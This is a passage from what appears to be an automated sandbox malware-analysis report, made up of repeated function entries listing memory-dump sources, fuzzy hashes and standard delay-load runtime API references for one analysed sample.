    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6ff57859162497a22b1877e75f98822f514b168d425d28158e9d659d295070ba
    • Instruction ID: 5cf3babc541e64faaabeea910a45ff9b77a2a6219c9b755bb17f693a9c1a49c9
    • Opcode Fuzzy Hash: 6ff57859162497a22b1877e75f98822f514b168d425d28158e9d659d295070ba
    • Instruction Fuzzy Hash: 41B012C127A0077D3B4421A16C06E3B021CC0D5B1A370803FF202C00C0F4601C023072
    Function 00CAF336 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e2b1882ef4208ce1758d5a379733d1e589e0e8f24c1d7bcbf81f610a92f51160
    • Instruction ID: feff9112ff3483f1eba4b6498d720655a0fbc3d86bcd2c08188569ab3cc7aab4
    • Opcode Fuzzy Hash: e2b1882ef4208ce1758d5a379733d1e589e0e8f24c1d7bcbf81f610a92f51160
    • Instruction Fuzzy Hash: 02B012C127A4037C3B8461A9BD02F3B022CC0D5B19370823FF202C5080F4901D033072
    Function 00CAF408 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1ff6f6d394afe73d0cd56b7834aa4494e204f3e7b8d621971a6961247220f38d
    • Instruction ID: a59e0ab633ff7b6f16f0087732efd3d651bae6fe09b07237e8618fd396ac35c9
    • Opcode Fuzzy Hash: 1ff6f6d394afe73d0cd56b7834aa4494e204f3e7b8d621971a6961247220f38d
    • Instruction Fuzzy Hash: 93B012C227A0077D3B8461A56C02F3B026CC0D5B19370813FF202C1080F4501C023072
    Function 00CAF41C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 69d98696406004d938bc88e3106157482f46bb3c9883c8242ebd807fc9d39eb8
    • Instruction ID: d97ee2d7b1664d270081b8c6cec56a7e07d8261f1d7e23151fbd37486b246042
    • Opcode Fuzzy Hash: 69d98696406004d938bc88e3106157482f46bb3c9883c8242ebd807fc9d39eb8
    • Instruction Fuzzy Hash: CFB012C127A1037C3BC461A56C03F3B021CC0D5B19331C13FF202C1080F4501C4230B2
    Function 00CAF412 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a74bd8e7bb50350b3afba577d626fc70512240fee0879111e2ef442b5ea80cba
    • Instruction ID: 655808a640bb3641fee440fee934dfe655becde1096ad342b46b0e7457034f28
    • Opcode Fuzzy Hash: a74bd8e7bb50350b3afba577d626fc70512240fee0879111e2ef442b5ea80cba
    • Instruction Fuzzy Hash: 02B0928127A0026C3A8461A56802E3A021CC096B19330803FF602C1080E45018022072
    Function 00CAF595 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ec2fb115d7c404f48a21dea8f1cb718f17c086bcdbc6a6b712910652652f057b
    • Instruction ID: eb61036881ab56127896baa4731ccd724dadb4835a4945a880f4e598e046c694
    • Opcode Fuzzy Hash: ec2fb115d7c404f48a21dea8f1cb718f17c086bcdbc6a6b712910652652f057b
    • Instruction Fuzzy Hash: 03B012C12B80067E324461AABC22F37054CC0C9B15331433FF202C1080E8904C0720B6
    Function 00CAF56D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 20184cd44af387286dd6bbdc3893b28331a1d9a70a0c0cdbb27ec1b26a3ccd6a
    • Instruction ID: 4229fb1af82512c294cce425607fdc66091e8bc88bf630a6830fd7eb12a399b4
    • Opcode Fuzzy Hash: 20184cd44af387286dd6bbdc3893b28331a1d9a70a0c0cdbb27ec1b26a3ccd6a
    • Instruction Fuzzy Hash: 54B012C12E810A7E324461AA7C22F37015CC0C9B15331413FF202C10C0E8904C0721B2
    Function 00CAF563 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cc7e594a858cd2bec63b9c9bb872454796593f4835aedca558241c65e619087c
    • Instruction ID: a4fc85b0f3b234e99bf0256f09d61f8e61bc91a31064d06423af214cdceab860
    • Opcode Fuzzy Hash: cc7e594a858cd2bec63b9c9bb872454796593f4835aedca558241c65e619087c
    • Instruction Fuzzy Hash: 84B012C12A82067E374461AA7C12E37019CC4C9B15332423FF202C10C0E8904C4B20B2
    Function 00CAF689 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2d7dff1bf671e3f06925ff58c4acb6c940fea25e0eb812d83cd3984544e59c14
    • Instruction ID: 58e5415fee7a82686ea1446b9984cee8c32411deac8115fc5c39b98720719f65
    • Opcode Fuzzy Hash: 2d7dff1bf671e3f06925ff58c4acb6c940fea25e0eb812d83cd3984544e59c14
    • Instruction Fuzzy Hash: 10B012C92785037C330821E1FD03D37010CC8C5B19330803FF302D44C1A8600C0320B2
    Function 00CAF6AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0e18510d7d02dd5f3e43dfa234a5d613704bd0908403e8d023f0a2f6a1d7d32d
    • Instruction ID: 57503eeba65c94a5a023a1c5c5a2b597e7d48fff5fb3e604697ac20e7e17965e
    • Opcode Fuzzy Hash: 0e18510d7d02dd5f3e43dfa234a5d613704bd0908403e8d023f0a2f6a1d7d32d
    • Instruction Fuzzy Hash: BEB012D12784037C324461F56D03E37010CC0C9B19330803FF302C42C0E8500C0721B2
    Function 00CAF6A4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 238328ac252a5a39bc75a4e3ff77234bbe6d9ece91128779d9274edb9679dc23
    • Instruction ID: 287ea57fb84d19b19b2553cdc864b99ce84176ba29cb5bed445bda06baaf6d4c
    • Opcode Fuzzy Hash: 238328ac252a5a39bc75a4e3ff77234bbe6d9ece91128779d9274edb9679dc23
    • Instruction Fuzzy Hash: 13B012D12781037C334461F56C03E37010CC4C9B19330413FF202C03C0E8500C4A21B2
    Function 00CAF70F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a57e18d6658fc1eb58a77902e739aeddeab55467380e250c3146f463fc35cd0f
    • Instruction ID: e9a858b7174945b2462490683737147642cd6d80253d5c83b8b075d75e640940
    • Opcode Fuzzy Hash: a57e18d6658fc1eb58a77902e739aeddeab55467380e250c3146f463fc35cd0f
    • Instruction Fuzzy Hash: 92B012C12785027C324461A5AD02F3B010CC0D5B15330C43FF202C4480E4901D432173
    Function 00CAF705 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2c030fbfd43a54ddb4897fb337a714a1396bcb96afb22e3b7bedbb50112368c1
    • Instruction ID: a61ec7b5e23ec5d213f2e40b142f44668e564999ee5c8ad60a5ed28e064a77f0
    • Opcode Fuzzy Hash: 2c030fbfd43a54ddb4897fb337a714a1396bcb96afb22e3b7bedbb50112368c1
    • Instruction Fuzzy Hash: 44B012C12781027C324461A5AC02F3F021CC0D6B19330C43FF602C0480E4501C422173
    Function 00CAF719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ecf9120849281585f1d448dca2e29cfec15a816123e521f0daa9ba2b06efab4d
    • Instruction ID: b82f6a99afde440c05d4e8b9e99f42ef09f9b04f92c6da1412f36758b88e6ada
    • Opcode Fuzzy Hash: ecf9120849281585f1d448dca2e29cfec15a816123e521f0daa9ba2b06efab4d
    • Instruction Fuzzy Hash: C8B012C12781027C324461A5AC02F3B010CC0D5B15330C43FF202C0880E4505C422173
    Function 00CAF72D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: dba06fc9fb5a4be1ddfe8ff6e1e4d37ff016a739f32af92ffe5f804b06a9cb8b
    • Instruction ID: 375714ea509ca33c21814242468bb90608d8480752035c66097e3e7bf7d44259
    • Opcode Fuzzy Hash: dba06fc9fb5a4be1ddfe8ff6e1e4d37ff016a739f32af92ffe5f804b06a9cb8b
    • Instruction Fuzzy Hash: 3BB012C12781027C335461A5AC02F3F010CC0D6B1A330C43FF602C5480E4601C462173
    Function 00CAF723 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
